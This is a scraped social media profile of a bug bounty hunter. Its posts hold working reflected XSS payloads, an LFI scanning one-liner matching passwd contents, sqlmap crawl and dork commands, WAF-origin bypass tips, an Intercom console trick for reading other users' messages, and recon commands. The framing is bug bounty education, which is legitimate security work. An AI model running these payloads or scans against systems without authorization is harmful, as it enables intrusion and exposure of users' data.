Otterly Profile
Otterly

@ott3rly

3,670
Followers
192
Following
101
Media
690
Statuses

Bug Bounty Hunger. Helping people to score bounties πŸ’°

Kaunas, Lietuva
Joined November 2016
Don't wanna be here? Send us removal request.
@ott3rly
Otterly
4 months
Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips
Tweet media one
6
129
423
@ott3rly
Otterly
2 months
6
48
228
@ott3rly
Otterly
3 months
I hate when a top-tier bug bounty hunter mentions on some podcast what he/she prefers checking sensitive areas of the application without mentioning where. A lot of beginners need help figuring out how to start and where to look for common issues. Here is my list of critical…
Tweet media one
4
52
193
@ott3rly
Otterly
5 months
My favorite ways to find API endpoints: 1️⃣ Check if targets have the swagger UI docs using nuclei: cat targets.txt | nuclei -id swagger-api | anew swagger-ui-endpoints.txt 2️⃣ Bruteforcing using dictionaries like or for better
3
57
187
@ott3rly
Otterly
5 months
Checklist πŸ“ for exploiting Windows IIS targets: βœ… Detect IIS instances - initial step to build wordlist of potential targets: 1️⃣ Nuclei: cat targets.txt | nuclei -silent -id tech-detect | grep "ms-iis" 2️⃣ Shodan dorks: - org:"Target inc." product:"IIS" -…
5
63
169
@ott3rly
Otterly
4 months
I earned $3000 on @bugcrowd . Tip: always recheck the endpoints collected on the "targets" tab on the burp. After testing certain functionalities, new endpoints could appear which might lead to interesting findings. #ItTakesACrowd #bugbounty #bugbountytip
Tweet media one
2
11
164
@ott3rly
Otterly
15 days
Whenever I see this icon on the website, I always open the browser dev tools console and paste these: - Intercom('show'); - Intercom('boot',{email:'known_user @gmail .com'}) If I can see messages of another person, it is an easy bounty! #bugbountytips #bugbounty #ethicalhacker
Tweet media one
6
30
159
@ott3rly
Otterly
4 months
Want to test for SQLi, RCE, but the target is behind annoying WAF? These are ways to find the origin IP, to bypass WAF restrictions: βœ… Check shodan first. Use ssl: or http.favicon.hash:<HASH> dorks to check if there are any results. This method is the…
3
39
139
@ott3rly
Otterly
1 month
Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead: ffuf -u " https://target\.com/payment.php?FUZZ=regular" -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt #bugbounty #bugbountytip #bugbountytips
Tweet media one
5
24
138
@ott3rly
Otterly
6 days
Quick LFI check oneliner for a fresh target: cat targets.txt | (gau || hakrawler || katana || gospider) | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" #bugbounty #infosec
3
36
133
@ott3rly
Otterly
11 days
One-liner to get subdomains from wayback: curl -s ' http://web\.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey' | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/www\.//g' | sed 's/:80//g' | sort -u #bugbounty #bugbountytips #cybersecuritytips
1
25
124
@ott3rly
Otterly
3 months
Use this Shodan filter, to get more recently added hosts: org:"<Org name>" after:1/1/2024 #BugBounty #informationsecurity #infosec
Tweet media one
2
33
123
@ott3rly
Otterly
5 months
As promised, I am sharing my current checklist πŸ“ for small scope targets (v0.1): - API docs/support pages. Explore functionality to understand the app better. - Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them. -
8
31
114
@ott3rly
Otterly
3 months
After playing around with the targeted website, with the proxy on, run this filter to find file uploads: #bugbounty #bugbountytip #bugbountytips
Tweet media one
0
17
108
@ott3rly
Otterly
2 months
Do you know that sqlmap has its own crawler? Run in the background easily: sqlmap -u ' https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12 #appsec #SQLi #hacking
Tweet media one
2
26
105
@ott3rly
Otterly
2 months
Base checklist πŸ“ for exploiting Tomcat servers: - Detect: β†’ Wappalyzer β†’ Nuclei β†’ Server error - use this to get the version! β†’ Response headers - Test common ports: 8080, 9080, 9443, 9005, 9009, 8082, 8180 - Try clicking on buttons - this is simply stupid but…
Tweet media one
3
27
101
@ott3rly
Otterly
4 months
Use these commands to parse waymore/gau or any other URL output to find interesting leads: 1️⃣grep -oP '^https?://(?:[^/]*/){2}' waymore.txt | sort -u | tee root-dirs.txt # This output is good for checking different apps of different domains 2️⃣cat waymore.txt | unfurl keys | awk…
4
20
93
@ott3rly
Otterly
2 months
Tip: If you are looking for wayback endpoints either by gau or waymore, do not pass the whole subdomain list of a single target. Both of these tools have a subdomain option, use that instead. #bugbounty #bugbountytips #bugbountytip
Tweet media one
1
11
90
@ott3rly
Otterly
4 months
I earned $950 for my submission on @bugcrowd Type: Business logic Tip: Try bypassing certain limitations, by using double submit. For example, open 2 browser tabs and try submitting both at the same time. #ItTakesACrowd #bugbounty #ethicalhacking
6
4
88
@ott3rly
Otterly
3 months
I earned $450 for my submission on @bugcrowd Even small bounties stack it up over time! Tip: Bypass product limits using race conditions. Either use the newest version of burp or turbo intruder plugin. #ItTakesACrowd #bugbounty #bugbountytips
4
5
84
@ott3rly
Otterly
4 months
On @Bugcrowd , In January, I submitted 6 bugs to 4 programs. Award-wise, it's the most profitable platform so far. #bugbounty #TogetherStronger
Tweet media one
5
0
81
@ott3rly
Otterly
4 months
FFUF could be used for fuzzing one endpoint for large amount of alive hosts: cat alive.txt | grep -v "filter" | ffuf -u https://FUZZ/endpoint -w - -fw 1 replace filter and /endpoint with your own :) #bugbounty #bugbountytips #CyberSecurity
1
18
79
@ott3rly
Otterly
2 months
DotGit Firefox extension could get you some serious P1/P2 vulnerabilities. It's a must-have in your hacker toolkit. Easy bug bounty money! #bugbounty #cybersecuritytips #ethicalhacking
Tweet media one
1
5
78
@ott3rly
Otterly
3 months
Sometimes Excel files could contain PII leaks, so use this Google dork: site:target\.com inurl:'xlsx' OR site:target\.com inurl:'xls' #ghacking #googlehacking #dorking
Tweet media one
0
20
79
@ott3rly
Otterly
4 months
One-liner of favicon hash for shodan: python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('[URL]',verify=False).content,'base64')))" Replace URL with and use http.favicon.hash:<HASH> #bugbounty #bugbountytips #infosecurity
Tweet media one
Tweet media two
2
21
75
@ott3rly
Otterly
3 months
I do have an OSCP cert by the way. Has it helped it to my bug bounty success? Not particularly, but I guess it did have some impact on my initial infosec journey. I have eventually transitioned from pen-testing to full-time bug hunting. #offsec #oscp #tryharder
Tweet media one
1
2
76
@ott3rly
Otterly
1 month
Just checked tool from @dorkipty . It can gather data from over 100+ search engines and this is a very cool feature. I know this is a pretty fresh tool, so I am looking forward to getting some updates from the team @fattselimi @badcrack3r . The only thing…
2
10
76
@ott3rly
Otterly
3 months
Use this one-liner to get a lot of fuzz endpoints from the crawler: cat targets.txt | hakrawler -d 5 -dr -insecure -t 10 -timeout 360 | tee hakrawler.txt #bugbounty #bugbountytips #bugbountytip
Tweet media one
2
14
75
@ott3rly
Otterly
4 months
Base checklist for testing AEM instances πŸ“‹: βœ… Identify. 1️⃣ Testing manually β‡’ Check wappalyzer. β‡’ Check the source of page, should see adobe links. 2️⃣ Automated approach β‡’ Google Dorking - site: intitle:content/dam ⇒…
0
21
73
@ott3rly
Otterly
7 months
One-liner to find sensitive PDF files on Wayback Machine for multiple domains (in the comments) #bugbountytip #bugbounty #informationsecurity
1
13
70
@ott3rly
Otterly
3 months
Another one-liner to get crawler endpoints: cat targets.txt | gospider -S - -q -d 5 -c 10 --sitemap --no-redirect -o gospider.txt Note: do not use for targets, with too many endpoints, like blogs, e-commerce sites, or social media. #bugbounty #bugbountytips #bugbountytip
Tweet media one
1
21
68
@ott3rly
Otterly
4 months
Tip of the day - add the following flag to httpx to get more results: -H 'Referer: localhost' Some servers have checks for headers. You could also experiment with other headers like Origin, X-Forwarded-For and etc. #bugbounty #bugbountytips #infosec
0
17
66
@ott3rly
Otterly
3 months
Have a txt file with the list of js endpoints? Use this nuclei command to check for token leaks: cat js-endpoints.txt | nuclei -tags token,tokens -es info #bugbounty #cybersecuritytips #cybersecurity
Tweet media one
1
14
65
@ott3rly
Otterly
22 days
A quick one-liner to get most of the wildcard domains of BBPs: curl -s https://raw\.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json | jq ".[][] | select(.bounty==true) | .domains[]" -r #bugbounty #bugbountytip #bugbountytips
0
14
66
@ott3rly
Otterly
3 months
4 Stages of the Bug Bounty Hunter: - Learning about Bug Bounty -> Finding the First VALID Bug. Gain foundational knowledge, learn about vulnerabilities, methodologies, and try to identify initial vulnerabilities. Register on one or multiple bug bounty platforms like Hackerone,
4
13
66
@ott3rly
Otterly
4 months
one-liner to quickly check unusual ports on many hosts using nmap: nmap -iL hosts.txt -Pn --min-rate 1000 --max-retries 1 --max-scan-delay 20ms -T4 --top-ports 1000 --exclude-ports 80,443,53,22,5060,8080 --open -oG nmap.out #bugbounty #networksecurity #nmap
3
12
63
@ott3rly
Otterly
4 months
Google Dork to check old websites on broad scope target: "Β© <company>. All rights reserved." -2024 -2023 -2022 #dorking #googlehacking #ghacking #bugbounty
0
13
64
@ott3rly
Otterly
4 months
If you are thinking of a good port scanner that is simple and fast, you could check out https://github\.com/nullt3r/jfscan I have tested it and it's pretty accurate. Of course, nothing can replace OG Nmap entirely. #networksec #netsec #infosecurity
Tweet media one
0
12
62
@ott3rly
Otterly
5 months
Check out my new blog post: Hunting Blind XSS on the Large Scale β€” Initial Setup #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
3
25
63
@ott3rly
Otterly
3 months
A quick way to scan for the s3 bucket list: s3scanner -bucket-file s3-buckets.txt -threads 16 | grep -aE 'Read|Write|Full' | tee results.txt #bugbounty #bugbountytip #bugbountytips
Tweet media one
0
20
60
@ott3rly
Otterly
4 months
Use this google dork to detect AEM instances: site:target\.com inurl:/content/dam/ #bugbounty #googlehacking #dorking
Tweet media one
1
8
62
@ott3rly
Otterly
4 months
If you are using gau to fetch some archive data, make sure to exclude a lot of extensions with --blacklist flag: cat t | gau --subs --blacklist png,jpg,jpeg,gif,mp3,mp4,svg,woff,woff2,etf,eof,otf,css,exe,ttf,eot #itsecurity #bugbounty #informationsecurity
1
10
62
@ott3rly
Otterly
1 month
Use this as a base checklist πŸ“ when testing cart πŸ›’functionality: 1️⃣ Is it possible to manipulate prices? - Try adding minus items. - Integer overflows. 2️⃣ Test coupon codes. - Add multiple coupon codes. - Race conditions - XSS payloads 3️⃣ postMessage issues. - Is the event
0
22
62
@ott3rly
Otterly
4 months
Another tip for testing RBAC issues: Use the Multi-Account Containers Firefox plugin. It could create a separate browser environment for each account you are testing. Pretty good tool when you have to test more than 2 account roles. #appsec #infosec #hacking
Tweet media one
4
11
59
@ott3rly
Otterly
8 days
Make sure you train your brain everyday. Reading writeups helps me to keep up with a game. I do recommend checking this list of Bug Bounty blogs by @G0LDEN_infosec . https://raw\.githubusercontent.com/g0ldencybersec/bugbountybloglist/main/blogs.txt #bugbounty #bugbountytips
1
11
60
@ott3rly
Otterly
2 months
Writing a good bug bounty report will result in bigger bounties! There were some cases when I got high severity instead of medium, just because I had put a lot of effort into constructing quality a report. At the end of the day, the human factor plays a big role in bug bounty…
Tweet media one
4
11
58
@ott3rly
Otterly
2 months
As promised, I will start doing some live videos after 1k subscribers. The plan is to do a recon part on YouTube and a hacking part on Discord. The main reason for that - hacking on live targets is pretty grey in terms of service of YouTube.
4
1
57
@ott3rly
Otterly
2 months
Another useful thing that sqlmap has is the Google Dorking flag. Combine with your favorite dork increase change finding SQLi: sqlmap -g 'site: inurl:\".php?id=1\"' #SQLi #infosecurity #cybersecurity
Tweet media one
1
9
58
@ott3rly
Otterly
2 months
Just passed 3000 followers! πŸ₯³πŸŽ‰πŸΎπŸ‘―‍♀️
10
0
49
@ott3rly
Otterly
28 days
I've been asked multiple times about my go-to resources when exploiting certain vulnerability types. For starters, I do recommend checking these resources: PayloadsAllTheThings - is an incredible GitHub repository filled with payloads and techniques for various types of security…
1
11
50
@ott3rly
Otterly
1 month
If you are new to bug bounty and do not have too much knowledge about most of the recon tools, you could try using some recon frameworks. They will help you a lot to do certain tasks in the background without overthinking or overcomplicating. Here is a list of recon frameworks…
2
5
49
@ott3rly
Otterly
3 months
While looking for open redirects, focus on these URL parameters: return,url,callback,forward,redirect,continue,domain,checkout,dest,goto,host,page,next. #bugbounty #bugbountytip #bugbountytips
Tweet media one
2
9
49
@ott3rly
Otterly
4 months
Another Google dork to detect AEM instances: site:target\.com inurl:/content/geometrixx/ #bugbounty #googlehacking #dorking
Tweet media one
1
7
48
@ott3rly
Otterly
4 months
Match & Replace is a very underrated feature of Burp Suite. I think more people should try to employ it in their test flow. My favorite rules: βœ… Simply replace false with true. This usually helps to unlock many hidden features of targeted web apps. Note in some cases it could
0
8
47
@ott3rly
Otterly
4 months
one-liner to get root directories () of the targeted domain: cat waymore.txt | grep -oP '^https?://(?:[^/]*/){2}' | sort -u | tee root-dirs.txt Could use this on gau, linkfinder or katana output as well. #bugbountytips #cybersecurity #oneliner
1
11
46
@ott3rly
Otterly
6 months
I don't like new Foxy Proxy interface :(
10
2
45
@ott3rly
Otterly
4 months
One-liner to check FTP issues from port-scanned hosts, using nuclei: cat port-scanned-hosts.txt | grep -E ':21$' | awk -F: '{print $1}' | nuclei -nh -id ftp-anonymous-login,ftp-weak-credentials #bugbounty #bugbountytip #bugbountytips
1
9
43
@ott3rly
Otterly
4 months
Program has "All in scope" in their policy? Use this checklist πŸ“‹ to collect list of root domains: βœ… Inspect the footer of their pages. Sometimes companies like to use same footer across their all domains. For example: "Β© 2024 The Coca‑Cola Company. All rights reserved." could
0
6
43
@ott3rly
Otterly
3 months
One more google dork to detect AEM instances: site:target\.com inurl:/etc.clientlibs #bugbounty #googlehacking #dorking
Tweet media one
1
9
44
@ott3rly
Otterly
4 months
Although both tools are pretty good for SQLi. This is my amateur bug hunter opinion. #bugbounty #infosec #infosecurity
Tweet media one
0
2
43
@ott3rly
Otterly
5 months
Hacking is all about trying million techniques until eventually at least one works. Having good methodology/checklists helps a lot. #bugbounty #hacking #hacktheplanet
5
0
42
@ott3rly
Otterly
21 days
Just adding small additions to your subfinder or amass config could greatly impact the number of subdomains that you could gather. There are a lot of free services that you could register for, don't be lazy, just do it! #BugBounty #bugbountytips #bugboutytip
5
0
42
@ott3rly
Otterly
3 months
One more dork for AEM instances: site:target\.com inurl: /libs/cq/security/userinfo.json #bugbounty #dork #dorking
Tweet media one
1
9
43
@ott3rly
Otterly
1 month
Just wanted to thank my followers and subscribers for all the support I get. I truly bump up my motivation to keep going. Have a pleasurable day!
3
0
43
@ott3rly
Otterly
5 months
This is simply stupid and common sense for most of you, but it made me the most bounties actually while doing manual hacking. #BugBounty #bugbountytip #cybersecuritytips Check down in the comments! ⬇️⬇️⬇️⬇️⬇️
1
8
42
@ott3rly
Otterly
3 months
Some areas could be technically OOS, but looking into it (not hacking) is allowed. It could lead to a bug that is IN SCOPE: - code repositories (GitHub/GitLab, etc.) - documentation pages (confluence, wiki pages, etc.) - cloud storage (AWS buckets, GCP buckets,) - office docs
1
5
42
@ott3rly
Otterly
4 months
I love it when they ask for a proof of concept video, even though there are 2 steps to reproduce πŸ˜‰ #sharethelove #peace #TogetherWeAreUnstoppable
Tweet media one
2
2
39
@ott3rly
Otterly
6 months
If you find Open redirect to URI endpoints (x-> /path), it is still possible to elevate to decent vuln. You just need to find the vulnerable enpoint to RXSS. This could be potentialy chained with other vulnerability like ATO or SSRF as well. #bugbounty #bugbountytips #infose
1
4
39
@ott3rly
Otterly
3 months
With the right configuration, feroxbuster could be a powerful tool for content discovery. If you haven't tried it, I highly recommend testing it out. It has some awesome features like, dynamically removing scans on the go, basic js crawling, etc. #bugbounty #itsec #itsecurity
Tweet media one
2
2
38
@ott3rly
Otterly
3 months
You will be surprised how much functionality is "hidden" in the app if you just create an account as an organization, not an individual. #bugbounty #bugbountytip #bugbountytips
Tweet media one
1
4
37
@ott3rly
Otterly
7 months
0
4
36
@ott3rly
Otterly
5 months
One-liner to check anonymous LDAP from port scanned hosts (naabu or ruscan output file): cat port-scanned-hosts.txt | grep -E ':389$' | awk -F: '{print $1}' | nuclei -nh -id ldap-anonymous-login #bugbounty #bugbountytip #bugbountytips
1
5
36
@ott3rly
Otterly
8 days
A great talk about recon in depth. I really recommend following him.
@HusseiN98D
Hussein Daher
10 days
⚠️"Attacking Organizations with Big Scope - from 0 to Hero" was my talk at #HitBxPhdays in Bangkok πŸ‡ΉπŸ‡­. Happy to share the slides and recording with the community. πŸ”΄ Slides: πŸ”΄ Recording: Enjoy! #bugbounty #infosec
23
199
606
1
3
35
@ott3rly
Otterly
3 months
500 Subscribers 🍾πŸ₯³πŸŽ‰
10
2
34